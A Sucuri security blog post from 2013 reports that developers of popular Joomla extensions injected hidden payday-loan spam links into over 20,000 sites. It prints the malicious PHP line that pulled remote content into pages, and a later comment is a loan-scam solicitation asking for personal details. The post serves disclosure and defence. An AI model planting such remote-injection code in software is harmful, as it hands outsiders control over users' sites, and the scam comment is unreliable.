• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

When Good Plugins Go Bad – SEO Spam on Joomla Websites

April 10, 2013Daniel Cid

0
SHARES
FacebookTwitterSubscribe

We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to paydaypam.co.uk. What’s even more scary is that in one day, the number of backlinks to paydaypam.co.uk, increased from 0 to almost 450k, according to ahrefs.com:

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.

Spam SEO Attacks on Joomla sites

Unfortunately, this story is not new. One of our readers pointed us to a very similar case that happened in the Joomla ecosystem just a few weeks before. In similar fashion, the campaign was able to infiltrate more than 20,000 sites. The developers involved were from many popular Joomla extensions:

iNowWeb.com (author: Sharif Mamdouh):
– AddThis For Joomla!
– Share This for Joomla!
– iNowSlider (mod_iNowSlider)
– iNow Twitter Widget (mod_TwitterWidget)
– BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
– Quotes By keyWord! (mod_JoomlaQuotes)
– iNow Wikio (mod_JoomlaWikio)
– iNow Twitter (mod_TwitterForJoomla)
– QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
– VirtueMart Advanced Search
– Skitter Slideshow
– FaceBook Slider
– Twitter Friends & Followers
– Flying Tweets
– Autson Twitter Search
– Twitter Quote
– FaceBook Show

Plimun.com:
– Plimun Twitter Ticker
– Twitter Show
– Nivo Slider

These guys tried to leverage their user base to inject the same type of SPAM seo (pay day loans) into any site running their extension[s]. In this case, the hidden backlinks were being called from:

$credit=file_get_contents("httx://www.inowweb. com/p.php?i=".$path);
echo $credit;

This allowed the extension developers to control and choose what to be displayed on any site using their software. The Joomla security team also reacted fast and banned these developers and their associated extensions.

Restricting the usage of Extensions

We have been talking about this for a while, but it is important to repeat. Limit your usage of extensions (or plugins), along with all other third party components, and only use from trusted sources. More importantly, only if you need the said functionality. The less plugins you have configured in your environment, the less chances you have to be caught in a similar situation. The last thing you want is to become part of a SPAM botnet.

If you are unsure if your site is showing those spammy keywords, you can scan it for free here: http://sitecheck.sucuri.net

0
SHARES
FacebookTwitterSubscribe

Categories: Joomla Security, Website Malware Infections, WordPress SecurityTags: Malware Updates, SEO Spam, WordPress Plugins and Themes

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Viktor Nagornyy

    April 10, 2013

    Thanks Daniel, great post. Were you able to find out how they were able to inject spam links into the social media widget plugin? One of our sites (monitored by Sucuri) had it installed and we did not upgrade it in a while, yet yesterday Sucuri picked it up. Or was it the case of you learning about it and adding to your database? Thanks.

  2. akash malik

    April 10, 2013

    Great post Daniel- It would be awesome if you keep us regularly updated on such issues by 3rd party plugins for Joomla & wordpress as we have lots of sites built using these 2 platforms. Akash | Facebook Apps | Apps Mav

  3. Bret Londo

    April 16, 2013

    i think it is a third party plugins, by the way thanks for your great post Daniel WordPress is pretty much set up for seo.

  4. John P

    May 16, 2013

    I found your site by searching on the trash that gets inserted on victims’ websites, which I’ve seen a couple of times lately, and the explanation was interesting to read. The reason I saw this effect in a couple of places was that I typically run my browser with JavaScript turned off, and when that’s the case, a visitor to the affected sites does see the hidden material.

  5. hopy

    May 24, 2013

    I am very much thanks to this website for proving the nice
    technology and for the information is also very great I am very much satisfied
    to this technology. You are very like this information and I am defiantly shore
    about that.

  6. Zach Smith

    June 28, 2013

    Thanks for publishing another great article for us. This is best for any technology related blog.

  7. MelindaFeedingFashion

    October 22, 2013

    My site has been attacked, I’ve had 848k comments on the one blog post I have sitting there. I’m not even actively using the blog. I am such a beginner here and can’t afford to pay IT people… Trying to figure out how to disable comments from the posts and hoping that will fix the problem, my host has shut down my site for excessive usage… Hope I am on the right track, struggling to find the clear info I need? If you know where I can get a clear how to, that would be great (I find the joomla help site so overwhelming but guess that’s where to look… Thanks

  8. easy

    September 16, 2014

    Do you need a Loan?
    Are you looking for Finance?
    Are you looking for a Loan to enlarge your business?
    I think you have come to the right place.
    We offer Loans atlow interest rate.
    Interested people should please contact us on
    For immediate response to your application, Kindly
    reply to this emails below only.
    (easyloanoffer1@gmail.com)

    Please, do provide us with the Following information if interested.
    1) Full Name:………
    2) Gender:………
    3) Loan Amount Needed:………
    4) Loan Duration:………
    5) Country:………
    6) Home Address:………
    7) Mobile Number:………
    8)Monthly Income:…………………
    9)Occupation:………………………
    )Which site did you here about us…………………
    Thanks and Best Regards.
    (easyloanoffer1@gmail.com)

    www.(easyloanoffer1@gmail.com)

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

Joomla Security Guide

WordPress Security Guide

How to know you can trust a plugin

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.